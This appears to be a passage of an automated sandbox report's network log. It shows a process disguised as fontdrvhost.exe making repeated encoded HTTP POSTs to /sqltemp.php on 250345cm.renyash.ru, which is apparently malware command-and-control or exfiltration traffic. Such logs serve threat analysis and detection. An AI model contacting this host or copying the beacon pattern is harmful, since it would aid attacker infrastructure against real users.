Jan 1, 2025 14:52:53.167794943 CET	1012	OUT	Data Raw: 53 53 5f 5d 54 51 51 56 58 56 52 59 56 50 59 51 5b 59 54 5b 55 59 50 58 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SS_]TQQVXVRYVPYQ[YT[UYPXZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-34!$-#8: -$Y?<*4]73+@&(-&Y.,Y-
Jan 1, 2025 14:52:53.266319036 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:53.529279947 CET	806	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zaw3ZBfXil5qFjXZUy%2F5GsGC2TEwpMTELPxJtKVjwTFgSA4XgLUNldHts%2BU95Ynaw6g8J%2Fvrb9SCFld46t0OpmoR0YogeDsmvO6bB8QzH8cJLwR%2Bxu029noxmaM15yyNmOym1oNk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fe0ca912efa7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4215&min_rtt=1891&rtt_var=5358&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=71268&cwnd=160&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49813	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:53.654299021 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:54.011516094 CET	1012	OUT	Data Raw: 56 51 5f 56 54 5b 51 55 58 56 52 59 56 50 59 5f 5b 5e 54 58 55 58 50 5b 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VQ_VT[QUXVRYVPY_[^TXUXP[Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.X$<*7Y0>?C;!=?:7>>8]73X+D%'.:&Y.,Y-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49814	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:54.033298016 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1852 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:54.386501074 CET	1852	OUT	Data Raw: 56 56 5a 50 51 5c 51 55 58 56 52 59 56 50 59 54 5b 5d 54 59 55 5c 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VVZPQ\QUXVRYVPYT[]TYU\PTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.X0?49%.7E;-V#?(9(>$ +<;!E%/-:&Y.,Y-
Jan 1, 2025 14:52:54.505791903 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:54.664134026 CET	955	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bi9udwIQ2wDZk5XfJBhPQDoDG6RpkmA4aa%2F1M7Okk%2BJrkBauExUZcIL6N3812E6baVXisWT8RwYjszr8YeoWvLb8Wtca9h7B%2F45%2FgrTINqPIhVQmoIjp9ep6sGJc6oYmNbgFYrLh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fe145f85425d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4354&min_rtt=1969&rtt_var=5509&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2171&delivery_rate=69355&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1f 26 0d 2a 13 04 1c 32 0c 05 05 3c 13 33 1e 25 3e 36 5a 3f 16 26 5c 27 3e 24 01 29 29 33 5d 35 3c 25 1c 31 38 3c 59 20 5b 3b 12 24 0e 2b 59 05 1c 20 06 21 2f 2c 11 2a 13 34 06 31 01 03 5a 33 3d 24 58 3f 3b 20 54 37 05 28 00 30 04 23 02 2a 3a 30 1d 27 2c 0d 5b 2f 2c 3d 52 24 00 2c 54 00 11 25 08 30 21 3f 06 23 37 28 5a 35 31 39 10 26 0a 00 15 32 3c 23 50 20 29 2a 16 25 0c 3b 13 23 23 2a 5a 27 2b 2d 5b 37 3d 0a 08 29 3e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&2<3%>6Z?&\'>$))3]5<%18<Y [;$+Y !/,41Z3=$X?; T7(0#:0',[/,=R$,T%0!?#7(Z519&2<#P )%;##*Z'+-[7=)>%S -H?WS0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49815	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:54.150602102 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1008 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:54.495874882 CET	1008	OUT	Data Raw: 56 53 5a 56 51 5a 54 5c 58 56 52 59 56 59 59 55 5b 5a 54 5c 55 55 50 55 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VSZVQZT\XVRYVYYU[ZT\UUPUZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.[0)7<1^0@.&4-$Y+_#W)#72Z?+=%<7R.&Y.,Y-)
Jan 1, 2025 14:52:54.595266104 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:54.850723028 CET	810	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H%2Fe7GVl7f6dTG25EaMvNbg6IPdntVH6%2BbflTv79GeUKTxiTS1w9VavXVRhBA1HqwfZ9nSF5ypOQRD28ij1%2FKg5%2BsrTq8Cn9zNJqUyDrEglRxFVGWe%2BbYx2gz8aYjeYx95E7N%2FpgM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fe14fe7242d3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4447&min_rtt=2227&rtt_var=5276&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1327&delivery_rate=73029&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49821	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:55.064404964 CET	295	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1008 Expect: 100-continue
Jan 1, 2025 14:52:55.417722940 CET	1008	OUT	Data Raw: 56 52 5a 53 51 5c 54 51 58 56 52 59 56 59 59 55 5b 59 54 59 55 5a 50 58 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VRZSQ\TQXVRYVYYU[YTYUZPXZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.&/]4?$<,9=V7>3<9 =-(]#" (862?,*&Y.,Y-)
Jan 1, 2025 14:52:55.535515070 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:55.705616951 CET	810	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F4mHlCScGv9dUe4ZNe%2Bs9%2BMyEtqnoxL7Do2gAkl6W%2BPMjSTXipbW%2FSMrJQtfmbJ1tIPZz9TByLy3THd88Nmp2kpr%2BrWvI9HKWARSrCFP3FDeHkT%2Bd6thlDooJOnM1zqsgpNNPyEK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fe1ac8414400-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4228&min_rtt=1652&rtt_var=5772&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1303&delivery_rate=65576&cwnd=155&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	49827	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:55.823117971 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:56.167776108 CET	1012	OUT	Data Raw: 53 53 5a 56 54 58 54 56 58 56 52 59 56 5d 59 50 5b 59 54 5f 55 55 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SSZVTXTVXVRYV]YP[YT_UUPTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.['5]"/'.(,9=##(9(>$\ 13[*("2?<::&Y.,Y-1
Jan 1, 2025 14:52:56.267302990 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:56.529376030 CET	806	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LvNL0BlVKKCJM9pd%2Ftnf9afiLrN5kjfdw5XUKXmNDIZ5yx4hAW7uyjcudBUyn6jTuKwUs4xhSsYbiKjtZlxVPFl%2BAS%2BjaflvR1uJy%2Bv8pR7HFGX2Eb5Xhl6NlNZxypMoUA5BXT6x"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fe1f6c428cc5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4202&min_rtt=1988&rtt_var=5174&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=74100&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	49833	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:56.655623913 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:57.011529922 CET	1012	OUT	Data Raw: 53 50 5f 51 54 59 54 5d 58 56 52 59 56 58 59 51 5b 5f 54 5f 55 59 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SP_QTYT]XVRYVXYQ[_T_UYP]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.X3!\"?.$>D/:)R - ?) (-<#7]*;5&/?U-&Y.,Y-%
Jan 1, 2025 14:52:57.120121002 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:57.376836061 CET	809	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gmXsKjmTtDfsq7KxreZKvX2PLTLtHjiUIalvTQMMjV08j%2FMV544oXbajeh%2F8xAYOn8H88b2lv73EUdbzvhxW3f4npH4Za6%2BHRaWtv%2FFQMqoB0wXaw3CT0t%2BAPNfSOXd3QgpeYwyt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fe24bc710f47-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3038&min_rtt=1752&rtt_var=3230&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=121202&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	49839	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:57.493779898 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:57.839742899 CET	1012	OUT	Data Raw: 56 50 5f 5c 51 58 54 55 58 56 52 59 56 50 59 5f 5b 5e 54 5b 55 5f 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: VP_\QXTUXVRYVPY_[^T[U_PTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-'Y)#1'-88!S .,())-+#++%'.&Y.,Y-
Jan 1, 2025 14:52:57.947257042 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:58.117566109 CET	807	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LPOPEx8kiQ2l4ukp75ACbKll46ZNpQqyxDb9s0deVMSZopmwZRqid9tBYyQghd%2FIQdTqNOF2S2D%2BIhkQu1UgDV2Wlq6KVp3lNckjhHXyouGhuGO2S8gs9%2FCtCNTdcZPAdxes%2FrhV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fe29ef2f4217-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3670&min_rtt=2244&rtt_var=3694&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=106928&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	49845	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:58.246815920 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:58.605243921 CET	1012	OUT	Data Raw: 53 57 5a 51 51 5d 54 51 58 56 52 59 56 5d 59 50 5b 5b 54 5a 55 5f 50 5c 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SWZQQ]TQXVRYV]YP[[TZU_P\Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-&/X /^0+B8:- =?U)>#!27(]=2'R:&Y.,Y-1
Jan 1, 2025 14:52:58.694487095 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:52:58.954049110 CET	804	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:52:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jCw5dvl6QFOHhXabPq%2BGlLyNx8SzPLcKqcQpKxUNLKAIT6rGpwFwUuCqWa%2FoPQzFlsNis2dlumibl0iLoE8NA5DFw4GFW9ige%2FhgnrnRiX1UoBvxd9I4dTkV4Y2CtiZrPBlXxXQv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fe2e88830c9e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2124&min_rtt=1658&rtt_var=1555&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=270821&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 42W\X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	49855	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:59.117568016 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:52:59.502351046 CET	1012	OUT	Data Raw: 53 50 5f 5d 51 5d 54 53 58 56 52 59 56 58 59 51 5b 5f 54 50 55 5c 50 59 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SP_]Q]TSXVRYVXYQ[_TPU\PYZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S._3?.4%Y'.'.)R -8^<94>?4!4<6&,(.:&Y.,Y-%
Jan 1, 2025 14:52:59.590369940 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	49857	104.21.38.84	80	6324	C:\Drivers\fontdrvhost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 14:52:59.675390005 CET	319	OUT	POST /sqltemp.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 250345cm.renyash.ru Content-Length: 1836 Expect: 100-continue Connection: Keep-Alive
Jan 1, 2025 14:53:00.027266979 CET	1836	OUT	Data Raw: 53 55 5a 54 51 5a 51 57 58 56 52 59 56 59 59 52 5b 58 54 58 55 5d 50 59 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b Data Ascii: SUZTQZQWXVRYVYYR[XTXU]PYZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.X$/ "%.'.9.!=8_*9 )\ 0<>%Y'-:&Y.,Y-5
Jan 1, 2025 14:53:00.119092941 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 14:53:00.283760071 CET	949	IN	HTTP/1.1 200 OK Date: Wed, 01 Jan 2025 13:53:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HLA1MyMLuQYSsQcrLeI6Bi5ss1QczFRjA0t4ZdFCUxzx9YugkYRNVf%2FFOCGRUJ3XuNqBqd2rhIBnp0Mfbqu5Z3bPNKVgfskP0VVlK7BbrjjU0zlKvnVvqGbMW0IXfNMl4WBmUiRN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fb2fe377a2f42ad-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1624&rtt_var=636&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2155&delivery_rate=841983&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 00 1f 25 54 3d 3e 2d 08 26 21 28 59 28 13 33 57 31 58 32 5b 29 3b 2a 1a 24 10 24 05 29 5f 3f 13 21 3c 08 01 31 01 20 12 37 13 33 58 30 34 2b 59 05 1c 20 0b 36 01 2f 00 3d 3d 30 07 26 01 03 5a 33 3e 0e 5f 3f 3b 30 1e 22 2b 20 00 27 2d 38 58 3e 04 02 55 26 2c 34 02 2e 2f 0c 0b 30 00 2c 54 00 11 26 57 27 0f 3b 00 37 09 3f 03 35 22 3d 1d 26 42 3e 56 26 3c 3b 53 23 00 26 16 26 32 2b 10 36 0d 21 02 26 2b 0b 58 23 04 33 1a 29 04 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%T=>-&!(Y(3W1X2[);*$$)_?!<1 73X04+Y 6/==0&Z3>_?;0"+ '-8X>U&,4./0,T&W';7?5"=&B>V&<;S#&&2+6!&+X#3)%S -H?WS0
